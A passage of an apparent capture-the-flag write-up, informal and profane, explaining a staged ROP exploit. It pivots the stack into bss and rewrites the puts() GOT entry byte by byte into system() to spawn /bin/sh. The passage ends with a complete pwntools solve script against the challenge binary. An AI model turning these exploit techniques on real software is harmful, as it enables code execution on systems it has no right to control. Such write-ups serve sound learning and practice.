<span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">ADD_PTR_RCX</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404958</span><span class="p">)</span> <span class="c1"># MYSTERY MOUSEKATOOL
</span><span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x4011cd</span><span class="p">)</span> <span class="c1"># leave ; ret
</span></code></pre></div></div>

<p>yeah just put it further down the line who gives a shit (keep in mind that after this <code class="language-plaintext highlighter-rouge">gets()</code> call, these separate rop chains dont actually get executed, we’re just preparing them for later. also keep an eye out for that line labelled <code class="language-plaintext highlighter-rouge">mystery mousekatool</code>  - recall that after the <code class="language-plaintext highlighter-rouge">add_ptr_rcx</code> gadget there is a <code class="language-plaintext highlighter-rouge">pop rbp</code>, meaning that <code class="language-plaintext highlighter-rouge">0x404958</code> is popped into rbp. directly after that is a <code class="language-plaintext highlighter-rouge">leave; ret;</code>, meaning whatever value is at <code class="language-plaintext highlighter-rouge">0x404958</code> goes into rbp, and whatever value is at <code class="language-plaintext highlighter-rouge">0x404960</code> goes into rsp (and consequently, our instruction pointer). of course, right now, those are all uninitialized. but…</p>

<p>final stage:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># 0x4048e0
</span><span class="n">p3</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x30</span><span class="s">'</span> <span class="o">*</span> <span class="mh">0x28</span>

<span class="n">p3</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">POP_RCX</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404010</span><span class="p">)</span>
<span class="n">p3</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">POP_RBP</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404118</span><span class="p">)</span>
<span class="n">p3</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">MOV_EAX</span><span class="p">)</span>
<span class="n">p3</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x55</span><span class="s">'</span> <span class="o">*</span> <span class="mh">0x28</span>

<span class="c1"># 0x404960
</span><span class="n">p3</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404168</span><span class="p">)</span> <span class="c1"># final rbp
</span><span class="n">p3</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x40101a</span><span class="p">)</span> <span class="c1"># ret to account for movaps
</span><span class="n">p3</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x4011ef</span><span class="p">)</span> <span class="c1"># final ret
</span></code></pre></div></div>

<p>in our third stage we just perform the first little bit of the ROP chain, and put <code class="language-plaintext highlighter-rouge">0x404118</code> into rbp. meaning, at the very start, at p2:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># 0x404110; step 1
</span><span class="n">p2</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">4</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mh">0x70</span><span class="p">)</span> <span class="c1"># byte that gets added
</span><span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1"># mov rsp, rbp, pop rbp
</span><span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">ADD_PTR_RCX</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404228</span><span class="p">)</span> <span class="c1"># this gadget also has a pop rbp
# and then do it all over
</span><span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">POP_RCX</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404011</span><span class="p">)</span>
<span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">MOV_EAX</span><span class="p">)</span>
</code></pre></div></div>

<p>we jump all the fucking way back here !</p>

<p>so, after we send p3, we initialize our rop chain then pivot into the three different frames at p2, which all increment the ptr to <code class="language-plaintext highlighter-rouge">puts()</code> byte-by-byte. then after p2 is done, we jump <em>BACK</em> to p3 and finish execution. (the final return address eventually sends us back to the <code class="language-plaintext highlighter-rouge">puts()</code> call, which is now <code class="language-plaintext highlighter-rouge">system()</code>, and we just exploit the fact that the <code class="language-plaintext highlighter-rouge">gets()</code> buffer and the <code class="language-plaintext highlighter-rouge">puts()</code> buffer r the same by inputting <code class="language-plaintext highlighter-rouge">'/bin/sh</code>’).</p>

<p>uhhhh,,,, yeaaaaa listen man i dont know either. it works! full solvescript i guess</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span>
<span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"./vuln_patched"</span><span class="p">)</span>
<span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"./libc.so.6"</span><span class="p">)</span>
<span class="n">ld</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"./ld-2.39.so"</span><span class="p">)</span>

<span class="n">context</span><span class="p">.</span><span class="n">binary</span> <span class="o">=</span> <span class="n">elf</span>
<span class="n">context</span><span class="p">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s">"alacritty"</span><span class="p">,</span> <span class="s">"-e"</span><span class="p">,</span> <span class="s">"bash"</span><span class="p">,</span> <span class="s">"-c"</span><span class="p">]</span>

<span class="n">p</span> <span class="o">=</span> <span class="n">process</span><span class="p">()</span>
<span class="n">gdb</span><span class="p">.</span><span class="n">attach</span><span class="p">(</span><span class="n">p</span><span class="p">)</span>

<span class="c1"># pivot stack into bss first, preparatory measure
</span><span class="n">p1</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x10</span><span class="s">'</span> <span class="o">*</span> <span class="mh">0x20</span>
<span class="n">p1</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404100</span><span class="p">)</span> <span class="c1"># bss
</span><span class="n">p1</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x401205</span><span class="p">)</span>

<span class="n">p</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">p1</span><span class="p">)</span>
<span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span>

<span class="n">POP_RCX</span> <span class="o">=</span> <span class="mh">0x000000000040117e</span>
<span class="n">POP_RBP</span> <span class="o">=</span> <span class="mh">0x000000000040115d</span>
<span class="n">MOV_EAX</span> <span class="o">=</span> <span class="mh">0x00000000004011ca</span>
<span class="n">ADD_PTR_RCX</span> <span class="o">=</span> <span class="mh">0x000000000040115b</span>

<span class="c1"># write to 0x4040e0
</span><span class="n">p2</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x20</span><span class="s">'</span> <span class="o">*</span> <span class="mh">0x20</span>
<span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404900</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x401205</span><span class="p">)</span> <span class="c1"># ret back to read
# preparing the ROP frames for later
</span>
<span class="c1"># 0x404110; step 1
</span><span class="n">p2</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">4</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mh">0x70</span><span class="p">)</span> <span class="c1"># byte that gets added
</span><span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1"># mov rsp, rbp, pop rbp
</span><span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">ADD_PTR_RCX</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404228</span><span class="p">)</span> <span class="c1"># this gadget also has a pop rbp
# and then do it all over
</span><span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">POP_RCX</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404011</span><span class="p">)</span>
<span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">MOV_EAX</span><span class="p">)</span>

<span class="n">p2</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">'/bin/sh</span><span class="se">\x00</span><span class="s">'</span> <span class="c1"># yeah just fucki just put it anywhere wh gives a shit
</span><span class="n">p2</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\xAA</span><span class="s">'</span> <span class="o">*</span> <span class="p">(</span><span class="mh">0x140</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">p2</span><span class="p">))</span> <span class="c1"># pad
</span>
<span class="c1"># 0x404220
</span><span class="n">p2</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">4</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mh">0x0c</span><span class="p">)</span>
<span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">ADD_PTR_RCX</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404338</span><span class="p">)</span>
<span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">POP_RCX</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404012</span><span class="p">)</span>
<span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">MOV_EAX</span><span class="p">)</span>
<span class="n">p2</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\xBB</span><span class="s">'</span> <span class="o">*</span> <span class="p">(</span><span class="mh">0x250</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">p2</span><span class="p">))</span>

<span class="c1"># 0x404330
</span><span class="n">p2</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">4</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mh">0xfd</span><span class="p">)</span>
<span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">ADD_PTR_RCX</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404958</span><span class="p">)</span>
<span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x4011cd</span><span class="p">)</span> <span class="c1"># leave ; ret
</span>
<span class="n">p</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">p2</span><span class="p">)</span>
<span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span>
<span class="c1"># 0x4048e0
</span><span class="n">p3</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x30</span><span class="s">'</span> <span class="o">*</span> <span class="mh">0x28</span>

<span class="n">p3</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">POP_RCX</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404010</span><span class="p">)</span>
<span class="n">p3</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">POP_RBP</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404118</span><span class="p">)</span>
<span class="n">p3</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">MOV_EAX</span><span class="p">)</span>
<span class="n">p3</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x55</span><span class="s">'</span> <span class="o">*</span> <span class="mh">0x28</span>

<span class="c1"># 0x404960
</span><span class="n">p3</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404168</span><span class="p">)</span> <span class="c1"># final rbp
</span><span class="n">p3</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x40101a</span><span class="p">)</span> <span class="c1"># movaps
</span><span class="n">p3</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x4011ef</span><span class="p">)</span> <span class="c1"># final ret
</span>
<span class="n">p</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">p3</span><span class="p">)</span>
<span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span>
<span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span>
</code></pre></div></div>

<p>this is like my second time doing a challenge of this nature and i think its quite funny that so early in i am already having to resort to this bullshit. the nature of these kinds of challenges is that theres many beautiful ways to do them (You Can Probably Ret2dlresolve This I Think I Dont Know really) but anyways well i had fun i guess ,,, like and subscribe for more normal pwn solutions</p>


</article>
      </div>
    </main>
  </body>
</html>
